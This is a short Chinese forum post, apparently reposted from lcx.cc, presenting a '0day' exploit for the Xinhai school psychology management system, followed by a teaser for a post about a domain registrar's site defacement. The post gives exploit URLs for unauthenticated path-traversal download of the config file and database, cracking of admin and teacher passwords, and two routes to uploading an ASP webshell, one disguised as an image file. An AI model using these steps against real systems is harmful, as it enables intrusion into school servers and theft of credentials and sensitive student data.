漏洞名称:心海学校心理管理系统0day by:shady
漏洞描述:admin/fileopen.asp没有验证是否登录
利用方法:
一:
admin/fileopen.asp?filename=../inc/SETTINGS.ASP
用记事本打开下载下的文件,得到数据库地址,
继续用fileopen.asp?filename=数据库相对地址,
下载后用access密码破解软件破解密码,
得到管理员或老师的账号密码,登陆后,
在admin/update.asp直接上传asp得到shell
二:
inc/upload.asp?fl=1.asp;1 上传图片格式的asp马,得到Shell
文章来源于lcx.cc:【ODay】心海学校心理管理系统0day
相关推荐: 【事件】新网(xinnet) xinnet.com 被黑
http://domain.xinnet.com/hack.txt 备注:2010-8-31 8:09:21 检查,黑页依旧存在。文章来源于lcx.cc:【事件】新网(xinnet) xinnet.com 被黑相关推荐: 【转载】我的祖国 - 中国现实,相…
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论